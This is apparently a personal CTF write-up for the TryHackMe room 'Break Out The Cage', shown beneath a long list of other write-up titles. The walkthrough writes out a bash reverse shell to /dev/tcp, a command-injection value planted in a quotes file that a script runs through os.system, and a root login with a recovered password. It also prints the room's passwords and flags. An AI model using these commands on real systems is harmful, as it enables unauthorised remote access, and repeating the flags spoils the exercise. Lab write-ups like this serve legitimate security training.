🙌
Writeups
LearningLinkedIn
  • The Great Escape
  • Lookback
  • Outlook NTLM Leak
  • Year of the Fox
  • PS Eclipse
  • Eavesdropper
  • Tony the Tiger
  • Intro to Offensive Security
  • MD2PDF
  • Content Security Policy
  • Agent T
  • Introduction to Flask
  • Atlas
  • Bugged
  • Sigma
  • Intro to Cloud Security
  • Holo
  • CCT2019
  • Opacity
  • Empline
  • Phishing Emails 5
  • BlueTeam
  • Tempest
  • hackerNote
  • Watcher
  • CMesS
  • HA Joker CTF
  • OWASP Top 10 2021
  • Metasploit
  • Oh My WebServer
  • Road
  • Anonymous
  • Ollie
  • Training for New Analyst
  • Tokyo Ghoul
  • Dependency Management
  • KoTH Food CTF
  • Android Malware Analysis
  • Intro To Pwntools
  • AD Certificate Templates
  • CVE 2022 26923
  • Basic Static Analysis
  • Introduction To Honeypots
  • Intro to Pipeline Automation
  • Intro to Containerisation
  • ARP Spoofing
  • Mindgames
  • Brute Force Heroes
  • SQLMAP
  • Insekube
  • TakeOver
  • Boiler CTF
  • GoldenEye
  • Splunk 3
  • Tempus Fugit Durius
  • Warzone 1
  • OWASP API Security Top 10 2
  • Temple
  • AllSignsPoint2Pwnage
  • OWASP API Security Top 10 1
  • Secret Recipe
  • NoNameCTF
  • Binex
  • Jack
  • Tactical Detection
  • Jurassic Park
  • DX1 Liberty Island
  • Brute
  • Biblioteca
  • Napping
  • Kubernetes for Everyone
  • 0day
  • Osiris
  • Set
  • NoSQL injection Basics
  • Warzone 2
  • Atlassian, CVE 2022 26134
  • Jason
  • VulnNet: Roasted
  • VulnNet Internal
  • VulnNet Node
  • Brooklyn Nine Nine
  • Thompson
  • The Cod Caper
  • Neighbour
  • ColddBox Easy
  • Library
  • All in One
  • Poster
  • Gallery
  • Cat Pictures
  • Boogeyman 1
  • Corridor
  • Team
  • Ra 2
  • Advent of Cyber 2022
  • Bookstore
  • Intro to Malware Analysis
  • TheHive Project
  • Velociraptor
  • KAPE
  • Lunizz CTF
  • Linux Forensics
  • DFIR An Introduction
  • Benign
  • Cyborg
  • Year of the rabbit
  • Blaster
  • Easy Peasy
  • Couch
  • Chocolate Factory
  • REmux The Tmux
  • Spring4Shell
  • Dirty Pipe
  • OverlayFS
  • Pwnkit
  • CTF collection Vol.2
  • Gotta Catch'em All!
  • Break Out The Cage
  • Bolt
  • Source
  • AttackerKB
  • Intro to Defensive Security
  • Careers in Cyber
  • OSI Model
  • Packets&Frames
  • Extending Your Network
  • How websites work
  • Putting it all together
  • Operating System Security
  • Network Security
  • Security Operations
  • Network Services
  • Network Services 2
  • Active Directory Basics
  • Attacking Kerberos
  • Subdomain Enumeration
  • Authentication Bypass
  • IDOR
  • File Inclusion
  • Masterminds
  • SSRF
  • Command Injection
  • Cross site Scripting
  • Burp Suite Extender
  • Burp Suite Intruder
  • Surfer
  • Willow
  • Conti
  • Unattended
  • Tardigrade
Powered by GitBook
On this page

Was this helpful?

Break Out The Cage

PreviousGotta Catch'em All!NextBolt

Last updated 2 years ago

Was this helpful?

ftp 10.10.65.125
get dad_tasks

Dads Tasks - The RAGE...THE CAGE... THE MAN... THE LEGEND!!!! One. Revamp the website Two. Put more quotes in script Three. Buy bee pesticide Four. Help him with acting lessons Five. Teach Dad what "information security" is. In case I forget.... Mydadisghostrideraintthatcoolnocausehesonfirejokes

ssh

==weston:Mydadisghostrideraintthatcoolnocausehesonfirejokes== (weston found in source code also question)

sudo -l
sudo /usr/bin/bees

Broadcast message from weston@national-treasure (pts/0) (Sat Aug 13 16:52:24 20 AHHHHHHH THEEEEE BEEEEESSSS!!!!!!!! (through wall)

find / -type f -user cage 2>/dev/null

/opt/.dads_scripts/spread_the_quotes.py /opt/.dads_scripts/.files/.quotes

cat /opt/.dads_scripts/spread_the_quotes.py

#!/usr/bin/env python #Copyright Weston 2k20 (Dad couldnt write this with all the time in the world!) import os import random lines = open("/opt/.dads_scripts/.files/.quotes").read().splitlines() quote = random.choice(lines) os.system("wall " + quote)

cat /opt/.dads_scripts/.files/.quotes

reverse shell

cat > some.sh << EOF-EOF block to print the contents enclosed within this block in the terminal.

cat > /tmp/shell.sh << EOF

write #!/bin/bash bash -i >& /dev/tcp/vpn-ip/4444 0>&1 EOF

or just nano

cat /tmp/shell.sh #!/bin/bash bash -i >& /dev/tcp/vpn-ip/4444 0>&1

chmod +x /tmp/shell.sh
printf 'anything;/tmp/shell.sh\n' > /opt/.dads_scripts/.files/.quotes

netcat(kali machine)

rlwrap nc -nlvp 4444 
ls
cat Super_Duper_Checklist

1 - Increase acting lesson budget by at least 30% 2 - Get Weston to stop wearing eye-liner 3 - Get a new pet octopus 4 - Try and keep current wife 5 - Figure out why Weston has this etched into his desk: ==THM{M37AL_0R_P3N_T35T1NG}==

priv esc

cat email_backup/*

==cageisnotalegend==

python3 -c "import pty;pty.spawn('/bin/bash')"
su root

pass: cageisnotalegend

cat /root/email_backups/*

==THM{8R1NG_D0WN_7H3_C493_L0N9_L1V3_M3}==

  • What is Weston's password?Mydadisghostrideraintthatcoolnocausehesonfirejokes

  • What's the user flag?THM{M37AL_0R_P3N_T35T1NG}

  • What's the root flag?THM{8R1NG_D0WN_7H3_C493_L0N9_L1V3_M3}

[[Gotta Catch'em All!]]

found cageisnotalegend and key face

vigener-solver
vigenere-tool